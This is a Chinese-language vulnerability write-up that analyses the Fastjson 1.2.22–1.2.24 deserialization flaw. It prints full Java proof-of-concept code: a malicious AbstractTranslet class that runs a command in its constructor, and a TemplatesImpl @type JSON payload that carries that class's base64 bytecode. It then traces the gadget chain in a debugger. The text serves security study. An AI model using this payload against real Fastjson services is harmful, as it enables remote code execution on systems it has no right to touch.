Fastjson 1.2.22-24 反序列化漏洞分析(1)

前言

FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。

影响版本:1.2.22-24

官方通告:https://github.com/alibaba/fastjson/wiki/security_update_20170315

补丁:https://github.com/alibaba/fastjson/commit/d075721cf396d5cb70e24c824b901e3a9a5b342b

漏洞分析

实验环境:jdk8u121

创建一个恶意类EvilPayload,继承AbstractTranslet

package com.yy.FastJson.payload01;

import com.sun.org.apache.xalan.internal.xsltc.DOM;

import com.sun.org.apache.xalan.internal.xsltc.TransletException;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;

import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class EvilPayload extends AbstractTranslet {

    public EvilPayload() throws IOException {

        Runtime.getRuntime().exec("calc");

    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    public static void main(String[] args) throws IOException {

        EvilPayload t = new EvilPayload();

    }

}

新建一个Poc类

package com.yy.FastJson.payload01;

import org.apache.commons.io.IOUtils;

import org.apache.commons.codec.binary.Base64;

import com.alibaba.fastjson.JSON;

import com.alibaba.fastjson.parser.Feature;

import com.alibaba.fastjson.parser.ParserConfig;

import java.io.ByteArrayOutputStream;

import java.io.File;

import java.io.FileInputStream;

import java.io.IOException;

public class Poc {

    public static String readClass(String cls){

        ByteArrayOutputStream bos = new ByteArrayOutputStream();

        try {

            IOUtils.copy(new FileInputStream(new File(cls)), bos);

        } catch (IOException e) {

            e.printStackTrace();

        }

        String result = Base64.encodeBase64String(bos.toByteArray());

        return result;

    }

    public static void bad_method() {

        ParserConfig config = new ParserConfig();

        String evil_path = "D:\\study\\java\\code\\vuln-master\\src\\main\\java\\com\\yy\\FastJson\\payload01\\EvilPayload.class";

        String evil_code = readClass(evil_path);

        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

        String json = "{\"@type\":\"" + NASTY_CLASS +

                "\",\"_bytecodes\":[\""+evil_code+"\"]," +

                "'_name':'yang'," +

                "'_tfactory':{}," +

                "\"_outputProperties\":{}}\n";

        System.out.println(json);

        Object obj = JSON.parseObject(json,Feature.SupportNonPublicField);

    }

    public static void main(String args[]) {

        bad_method();

    }

}

上面生成的text1为:

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAAD...这里是EvilPayload.class的字节码文件转换成base64的字符串"],'_name':'yang','_tfactory':{ },"_outputProperties":{ }}

解析:

Poc类中的readClass方法,把class文件读取,然后进行base64编码变成字符串。

@type后面指定了反序列化的类为TemplatesImpl类,其类的属性

_bytecodes设置为恶意类

_name设置为yang

_tfactory设置为空

_outputProperties也为空

这个poc利用的就是parseObject或者parse

poc调试:

这个调用链的入口是getOutputProperties方法,其中的Getter方法满足加入fieldList[]列表的条件,所以无论是用parseObject还是parse都会调用get方法

前面在fastjson中,会把evil_code进行base64解码后设置给_bytecodes

把断点下到newTransformer().getOutputProperties()

跟进newTransformer()方法,其调用了getTransletInstance()方法

跟进getTransletInstance()方法,其_class为null,所以会调用到defineTransletClasses()方法

跟进defineTransletClasses()方法

这个方法调用了defineClass()方法,可以从byte[]还原出一个Class对象,Class对象在调用newInstance()方法就会进行实例化

回到getTransletInstance()方法中,进行了newInstance()实例化,然后就会调用其构造方法触发执行。

注意点:

1)TemplatesImpl中_name的值不为null,才会调用到defineTransletClasses

2)_bytecodes为null会报异常

3)_tfactory会调用getExternalExtensionsMap()方法,如果为null会报错

_tfactory是在fastjson中被赋值的

图片来源:https://blog.csdn.net/qq_34101364/article/details/111706189

4)恶意类要继承AbstractTranslet类,因为这里会进行类型转换

总结:

fastjson在反序列化过程中,会getOutputProperties()方法,最后调用到newInstance()方法就会进行实例化触发构造函数的执行。

无论通过fastjson哪种方式解析json字符串,都会触发getOutputProperties()方法,但要注意的是,前提是开发需要代码中写了Feature.SupportNonPublicField选项,导致了利用点更加的苛刻。

参考:

https://www.anquanke.com/post/id/211035#h2-5

https://blog.csdn.net/qq_34101364/article/details/111706189

https://www.cnblogs.com/sijidou/p/13121332.html?ivk_sa=1024320u

Fastjson 1.2.22-24 反序列化漏洞分析(1)的更多相关文章

  1. Fastjson 1.2.22-24 反序列化漏洞分析

    目录 0x00 废话 0x01 简单介绍 FastJson的简单使用 0x02 原理分析 分析POC 调试分析 0x03 复现过程 0x04 参考文章 0x00 废话 balabala 开始 0x01 ...

  2. Fastjson反序列化漏洞分析 1.2.22-1.2.24

    Fastjson反序列化漏洞分析 1.2.22-1.2.24 Fastjson是Alibaba开发的Java语言编写的高性能JSON库,用于将数据在JSON和Java Object之间互相转换,提供两 ...

  3. Java安全之Fastjson反序列化漏洞分析

    Java安全之Fastjson反序列化漏洞分析 首发:先知论坛 0x00 前言 在前面的RMI和JNDI注入学习里面为本次的Fastjson打了一个比较好的基础.利于后面的漏洞分析. 0x01 Fas ...

  4. Fastjson 1.2.22-24 反序列化漏洞分析(2)

    Fastjson 1.2.22-24 反序列化漏洞分析(2) 1.环境搭建 我们以ubuntu作为被攻击的服务器,本机电脑作为攻击者 本机地址:192.168.202.1 ubuntu地址:192.1 ...

  5. Shiro 550反序列化漏洞分析

    Shiro 550反序列化漏洞分析 一.漏洞简介 影响版本:Apache Shiro < 1.2.4 特征判断:返回包中包含rememberMe=deleteMe字段. Apache Shiro ...

  6. Java反序列化漏洞分析

    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...

  7. ref:Java安全之反序列化漏洞分析(简单-朴实)

    ref:https://mp.weixin.qq.com/s?__biz=MzIzMzgxOTQ5NA==&mid=2247484200&idx=1&sn=8f3201f44e ...

  8. Java安全之Shiro 550反序列化漏洞分析

    Java安全之Shiro 550反序列化漏洞分析 首发自安全客:Java安全之Shiro 550反序列化漏洞分析 0x00 前言 在近些时间基本都能在一些渗透或者是攻防演练中看到Shiro的身影,也是 ...

  9. Java安全之Cas反序列化漏洞分析

    Java安全之Cas反序列化漏洞分析 0x00 前言 某次项目中遇到Cas,以前没接触过,借此机会学习一波. 0x01 Cas 简介 CAS 是 Yale 大学发起的一个开源项目,旨在为 Web 应用 ...

随机推荐

  1. Java基础(一):I/O多路复用模型及Linux中的应用

    IO多路复用模型广泛的应用于各种高并发的中间件中,那么区别于其他模式他的优势是什么.其核心设计思想又是什么.其在Linux中是如何实现的? I/O模型 I/O模型主要有以下五种: 同步阻塞I/O:I/ ...

  2. 53. 最大子序和(剑指 Offer 42)

    53. 最大子序和(剑指 Offer 42) 知识点:数组:前缀和:哨兵:动态规划:贪心:分治: 题目描述 输入一个整型数组,数组中的一个或连续多个整数组成一个子数组.求所有子数组的和的最大值. 要求 ...

  3. jdk、jre环境变量配置

    1 jdk和jre的区别: (jdk:Java 开发工具包) (jre:Java 的运行环境) 只需这么记就可以了,想深入了解得自行查询相关资料 2 jdk是包含jre的,所以只需下载jdk. 官方网 ...

  4. 从门外汉到腾讯Android高级研发——一个半路出家菜鸟的艰难逆袭之路

    我是在去年3月份加入腾讯公司,目前是腾讯公司某技术部门里面的一个小负责人,年薪月薪大税后概30K,谈不上多么厉害,但在回想自己半路出家学习编程,从一个销售到现在终于进入中国互联网顶尖公司,还是有些许感 ...

  5. 在Ant脚本中使用时间戳

    时间戳在项目自动构建中广泛使用,例如在jar文件的manifest文件中,以及最后zip包的文件名里等,时间戳对应的Ant命令是,这个标签既可以用在一个内部,也可以放在外部用作"全局&quo ...

  6. VBA·Function的基础使用

    阅文时长 | 0.27分钟 字数统计 | 440字符 主要内容 | 1.引言&背景 2.基本结构 3.Demo示例 4.声明与参考资料 『VBA·Function的基础使用』 编写人 | SC ...

  7. STP规则

    1)每个网络的有且只有一个桥根 2)每个非桥根有且只有一个根端口: 3)每条链路有且只有一个指定端口: 4)根桥的所有端口均为指定端口: 5)根端口和指定端口都是forwading: 6)阻塞端口为B ...

  8. E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?

    E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)E: Unable to l ...

  9. sentinel使用(结合OpenFeign)

    前提 需要先安装sentinel. 父项目POM pom.xml <?xml version="1.0" encoding="UTF-8"?> &l ...

  10. C#高级应用之------HashTable、HashSet和Dictionary的区别(转)

    原文url:http://www.cnblogs.com/akwwl/p/3680376.html 今天又去面试了,结果依然很悲催,平时太过于关注表面上的东西,有些实质却不太清楚,遇到HashTabl ...